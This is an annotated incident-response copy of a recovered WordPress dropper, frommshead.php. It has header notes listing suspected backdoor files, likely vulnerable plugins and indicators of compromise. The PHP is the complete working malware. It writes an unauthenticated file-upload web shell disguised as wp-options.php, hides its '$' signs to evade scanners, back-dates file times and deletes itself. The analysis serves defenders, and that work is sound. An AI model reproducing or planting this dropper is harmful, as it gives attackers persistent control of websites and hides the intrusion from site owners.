| 1 | /* Found a dropper (the script below, served as frommshead.php) that writes an unauthenticated file-upload shell as wp-admin/wp-optionstmp.php, renames it to wp-options.php in the WordPress root, back-dates the file timestamps, and then deletes itself. It was planted by an unknown earlier backdoor and does nothing until frommshead.php is requested directly. | |
| 2 | ||
| 3 | Other possible backdoors are the following files, which maldet flagged in production as command shells: | |
| 4 | wp-includes/js/thickbox/rvbt28.php | |
| 5 | wp-includes/class-wp-xmlrpc.php  (the name mimics core's class-wp-xmlrpc-server.php; as far as we know core ships no file with exactly this name - verify against the core checksums) | |
| 6 | wp-content/themes/agentpress/mtgh.php | |
| 7 | ||
| 8 | The backdoors may have been placed through one or more vulnerable components. Two that were present in production are listed below; it is not confirmed which (if either) was the actual entry point: | |
| 9 | http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html | |
| 10 | http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html | |
| 11 | ||
| 12 | A separate backdoor has inserted eval(base64_decode(...)) into footer.php of every theme under wp-content/themes/, preceded by a comment claiming it is WP cache code. This may be unrelated to frommshead.php, or it may have been planted through one of the backdoors listed above. | |
| 13 | ||
| 14 | Still hunting for backdoors that evaded maldet. Because this dropper back-dates mtime with touch(), do not triage by modification time alone - use ctime (inode change time) and compare files against upstream WordPress core/plugin checksums. | |
| 15 | */ | |
| 16 | ||
<?php
// ===========================================================================
// ANNOTATED MALWARE SAMPLE - DO NOT DEPLOY.
// The PHP below is the dropper exactly as recovered; only comments were added.
//
// What this file does, in order (each step is visible below):
//   1. Writes a second PHP file, wp-optionstmp.php, into its own directory.
//      That file is an unauthenticated file-upload form.
//   2. Renames it to ../wp-options.php - the WordPress root, given that this
//      script sits in wp-admin/ as the header notes say.
//   3. Back-dates the mtime of every file it creates, and of itself, to
//      2013-12-31 12:17:11 (server local time) with touch()/mktime().
//   4. Deletes frommshead.php, which is presumably this script's own name.
// Each step echoes "Proceeded: ... > Succesfull" or "... > Error!" to the
// requester, so in the access log a hit on frommshead.php followed by POSTs
// to /wp-options.php from the same client is the pattern to look for.
//
// Indicators of compromise, all taken from literal strings in this file:
//   paths : wp-admin/wp-optionstmp.php, <docroot>/wp-options.php, frommshead.php
//           (as far as the reviewer knows WordPress core ships no file named
//           wp-options.php - the name is chosen to blend in; confirm against
//           core checksums)
//   mtime : 2013-12-31 12:17:11 local time on any PHP file under the docroot
//   text  : "Proceeded:", "Succesfull", "#_FILES['image']", "#_POST['Submit']"
// ===========================================================================

$DEBUG_MODE=false;   // assigned here but never read anywhere in this file

// Payload that becomes wp-options.php (an upload shell).
// Every '$' is written as '#' and swapped back at write time (see the
// str_replace() below). That keeps the literal strings $_POST/$_FILES out of
// this dropper - presumably to dodge simple signature scans - and it also
// stops PHP from interpolating those variables inside this double-quoted
// string, which would otherwise happen.
//
// Behaviour of the dropped shell, as written:
//   * POST with a 'Submit' field and an 'image' file part: the upload is moved
//     to #filedir . <client-supplied name>, and #filedir is '' - i.e. the
//     directory the shell runs from, normally the WordPress root after step 2.
//     There is no authentication and no extension or MIME check; #maxfile is
//     assigned but never enforced, so a file of any name (PHP normally strips
//     directory components from $_FILES[..]['name'], but nothing here blocks
//     *.php) and any size can be written. The '@' hides move_uploaded_file()
//     warnings.
//   * Any other request: it just renders the upload form.
$file_data_head ="<?php
if(isset(#_POST['Submit'])){
#filedir = '';
#maxfile = '2888888';

#userfile_name = #_FILES['image']['name'];
#userfile_tmp = #_FILES['image']['tmp_name'];
if (isset(#_FILES['image']['name'])) {
#abod = #filedir.#userfile_name;
@move_uploaded_file(#userfile_tmp, #abod);

}
}
else{
echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>';
}
?>";

// Step 1: write the shell next to this script as wp-optionstmp.php, then
// timestomp it. mktime(hour, minute, second, month, day, year) =
// 2013-12-31 12:17:11 in the server's local timezone.
// NOTE(review): $start is never assigned in this file, so the echoed path is
// just "/wp-admin/wp-options.php" (plus an undefined-variable notice if those
// are displayed).
echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>";
if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) {
touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013));
echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>";
} else {
echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>";
}

// Step 2: move the shell one directory up (the WordPress root when this runs
// from wp-admin/) under its final name, then timestomp it again. On POSIX,
// rename() would silently replace any existing ../wp-options.php.
$file = 'wp-optionstmp.php';
$newfile = '../wp-options.php';

echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>";
if (rename($file,$newfile)) {
touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013));
echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>";
} else {
echo"Proceeded: ".$start."/wp-options.php > Error!<br>";
}

// Step 3: self-delete. frommshead.php is presumably this script's own file
// name (the header notes say it is triggered by a direct request to it).
// Touching the file right before unlinking it has no lasting effect when the
// unlink succeeds; it only leaves a back-dated copy behind if unlink() fails
// (e.g. the directory is not writable by the web server). Unlike the earlier
// steps, no status line is echoed for this one.
$file='frommshead.php';

echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>";
touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013));
unlink($file);